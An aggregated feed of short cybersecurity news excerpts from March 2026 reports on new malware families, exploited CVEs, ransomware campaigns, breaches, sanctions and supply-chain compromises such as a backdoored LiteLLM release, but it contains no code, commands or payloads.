Cybersecurity researchers have disclosed a new Android malware family called Perseus that's being actively distributed in the wild with an aim to conduct device takeover (DTO) and financial fraud. Perseus is built upon the foundations of Cerberus and Phoenix, at the same time evolving into a "more flexible and capable platform" for compromising Android devices through dropper apps distributed
Published: 2026-03-19T18:13:00
Security teams have spent years building identity and access controls for human users and service accounts. But a new category of actor has quietly entered most enterprise environments, and it operates entirely outside those controls. Claude Code, Anthropic's AI coding agent, is now running across engineering organizations at scale. It reads files, executes shell commands, calls external APIs,
Published: 2026-03-19T16:28:00
A new exploit kit for Apple iOS devices designed to steal sensitive data from is being wielded by multiple threat actors since at least November 2025, according to reports from Google Threat Intelligence Group (GTIG), iVerify, and Lookout. According to GTIG, multiple commercial surveillance vendors and suspected state-sponsored actors have utilized the full-chain exploit kit, codenamed DarkSword
Published: 2026-03-19T14:44:00
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged government agencies to apply patches for two security flaws impacting Synacor Zimbra Collaboration Suite (ZCS) and Microsoft Office SharePoint, stating they have been actively exploited in the wild. The vulnerabilities in question are as follows - CVE-2025-66376 (CVSS score: 7.2) - A stored cross-site scripting
Published: 2026-03-19T11:35:00
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) has sanctioned six individuals and two entities for their involvement in the Democratic People's Republic of Korea (DPRK) information technology (IT) worker scheme with an aim to defraud U.S. businesses and generate illicit revenue for the regime to fund its weapons of mass destruction (WMD) programs. "The North Korean
Published: 2026-03-18T22:56:00
Amazon Threat Intelligence is warning of an active Interlock ransomware campaign that's exploiting a recently disclosed critical security flaw in Cisco Secure Firewall Management Center (FMC) Software. The vulnerability in question is CVE-2026-20131 (CVSS score: 10.0), a case of insecure deserialization of user-supplied Java byte stream, which could allow an unauthenticated, remote attacker to
Published: 2026-03-18T21:30:00
Cybersecurity researchers have disclosed a critical security flaw impacting the GNU InetUtils telnet daemon (telnetd) that could be exploited by an unauthenticated remote attacker to execute arbitrary code with elevated privileges. The vulnerability, tracked as CVE-2026-32746, carries a CVSS score of 9.8 out of 10.0. It has been described as a case of out-of-bounds write in the LINEMODE Set
Published: 2026-03-18T18:00:00
When a Magecart payload hides inside the EXIF data of a dynamically loaded third-party favicon, no repository scanner will catch it because the malicious code never actually touches your repo. As teams adopt Claude Code Security for static analysis, this is the exact technical boundary where AI code scanning stops and client-side runtime execution begins. A detailed analysis of where Claude
Published: 2026-03-18T17:28:00
Cybersecurity researchers have warned about the risks posed by low-cost IP KVM (Keyboard, Video, Mouse over Internet Protocol) devices, which can grant attackers extensive control over compromised hosts. The nine vulnerabilities, discovered by Eclypsium, span four different products from GL-iNet Comet RM-1, Angeet/Yeeso ES3 KVM, Sipeed NanoKVM, and JetKVM. The most severe of them allow
Published: 2026-03-18T17:12:00
Security teams today are not short on tools or data. They are overwhelmed by both. Yet within the terabytes of alerts, exposures, and misconfigurations security teams still struggle to understand context: Q: Which exposures, misconfigurations, and vulnerabilities chain together to create viable attack paths to crown jewels? Even the most mature security teams can’t answer that
Published: 2026-03-18T16:00:00
A high-severity security flaw affecting default installations of Ubuntu Desktop versions 24.04 and later could be exploited to escalate privileges to the root level. Tracked as CVE-2026-3888 (CVSS score: 7.8), the issue could allow an attacker to seize control of a susceptible system. "This flaw (CVE-2026-3888) allows an unprivileged local attacker to escalate privileges to full root access
Published: 2026-03-18T13:38:00
Apple on Tuesday released its first round of Background Security Improvements to address a security flaw in WebKit that affects iOS, iPadOS, and macOS. The vulnerability, tracked as CVE-2026-20643 (CVSS score: N/A), has been described as a cross-origin issue in WebKit's Navigation API that could be exploited to bypass the same-origin policy when processing maliciously crafted web content. The
Published: 2026-03-18T12:01:00
Cybersecurity researchers have disclosed details of a new method for exfiltrating sensitive data from artificial intelligence (AI) code execution environments using domain name system (DNS) queries. In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter's sandbox mode permits outbound DNS queries that an attacker can exploit to enable interactive shells
Published: 2026-03-17T22:09:00
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials
Published: 2026-03-17T20:04:00
A majority of security leaders are struggling to defend AI systems with tools and skills that are not fit for the challenge, according to the AI and Adversarial Testing Benchmark Report 2026 from Pentera. The report, based on a survey of 300 US CISOs and senior security leaders, examines how organizations are securing AI infrastructure and highlights critical gaps tied to skills shortages and
Published: 2026-03-17T17:00:00
TP-Link patched a high severity flaw (CVE-2025-15517) in Archer NX routers that could let attackers bypass authentication and install malicious firmware. TP-Link issued security updates for its Archer NX router series to fix multiple vulnerabilities, including CVE-2025-15517 (CVSS score of 8.6), a critical authentication bypass flaw. The vulnerability impacts multiple models, including NX200, NX210, NX500, […]
Published: 2026-03-25T14:44:41
A Navia breach exposed personal data of nearly 300 HackerOne employees after attackers compromised the benefits provider. HackerOne revealed that a data breach at Navia Benefit Solutions exposed the personal information of nearly 300 of its employees. The incident stems from an attack on the third-party benefits provider, highlighting how breaches at external partners can […]
Published: 2026-03-25T12:37:14
The FCC will ban new foreign-made routers in the U.S. over security risks, unless approved by DHS or defense authorities. The U.S. FCC announced a ban on importing new foreign-made consumer routers, citing unacceptable cyber and national security risks. The decision, backed by Executive Branch assessments, means such devices can no longer be sold or […]
Published: 2026-03-25T11:22:21
Cybercrime group Lapsus$ claims it hacked AstraZeneca, stealing 3GB of data including credentials, code, and employee information. The Lapsus$ group claims it breached AstraZeneca, stealing about 3GB of sensitive data. The alleged leak includes credentials, tokens, internal code repositories (Java, Angular, Python), and employee information, though the company has not yet confirmed the breach. Even […]
Published: 2026-03-25T10:00:48
TeamPCP backdoored LiteLLM v1.82.7 1.82.8, likely via Trivy CI/CD, adding tools to steal credentials, move in Kubernetes, and keep persistent access. Threat actor TeamPCP compromised LiteLLM versions 1.82.7 and 1.82.8, likely through a Trivy CI/CD breach. LiteLLM, with over 95 million monthly downloads, helps developers route LLM requests via a single API. The malicious releases, now […]
Published: 2026-03-25T08:50:18
Dutch Ministry of Finance disclosed a data breach affecting some employees following a cyberattack, investigation is ongoing. The Dutch Ministry of Finance disclosed a cyberattack detected on March 19 after a third-party alert. Attackers breached some internal systems, the incident impacted a “portion of the employees”. Authorities are still investigating the incident and its full […]
Published: 2026-03-24T19:27:56
Over 3.1M people affected as QualDerm Partners suffered a December 2025 breach, exposing personal, medical, and health insurance data. Over 3.1 million people are affected by a December 2025 data breach at QualDerm Partners, where hackers stole personal, medical, and health insurance information from the company’s internal systems. QualDerm Partners is a U.S.-based healthcare management […]
Published: 2026-03-24T15:05:05
Citrix warns of a critical NetScaler flaw (CVE-2026-3055) that could leak sensitive data; users are urged to apply security updates immediately. Citrix issued security updates for two NetScaler vulnerabilities, including a critical memory overread, tracked as CVE-2026-3055 (CVSS score of 9.3), that allows unauthenticated attackers to leak sensitive data. The flaw CVE-2026-3055 is an insufficient […]
Published: 2026-03-24T12:46:49
U.S. sentences Russian hacker Aleksei Volkov to 81 months in prison for aiding ransomware attacks, causing over $9M in damages. A U.S. court sentenced Aleksei Olegovich Volkov to 81 months in prison for supporting ransomware groups like Yanluowang. He helped carry out dozens of attacks, causing over $9M in losses. Arrested in Italy in 2024 […]
Published: 2026-03-24T11:32:58
North Korea-linked threat actors use VS Code auto-run tasks to spread StoatWaffle malware via malicious projects that execute on folder open. North Korea-linked threat actor Team 8 behind the Contagious Interview campaign is spreading StoatWaffle malware through malicious Microsoft Visual Studio Code projects. Since late 2025, they have abused the “tasks.json” auto-run feature in Microsoft […]
Published: 2026-03-24T07:09:45